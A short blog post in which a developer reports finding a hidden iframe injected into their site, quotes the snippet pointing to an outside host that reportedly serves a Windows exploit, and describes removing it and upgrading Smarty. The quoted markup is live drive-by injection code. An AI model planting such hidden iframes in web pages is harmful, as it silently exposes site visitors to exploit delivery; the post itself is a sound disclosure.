Compromised

Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page.

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>

The hidden iFrame loads a Windows exploit.

I have it removed, for the time being.

I don’t know how long it’s been there, but the source may be an exploit of an old version of Smarty I was using. I’ve upgraded to the current stable version of Smarty.

Maybe I’ll switch to Savant for templating.

Possibly Related posts (machine generated):

  1. Savant3: Simple Templating for PHP5
  2. The Dynamic Duo of PEAR::DB and Smarty
  3. Zend IDE 2.0 Beta runs under OS X
  4. The New More Like This
  5. Cross Talk

More like this: , , .

blog comments powered by Disqus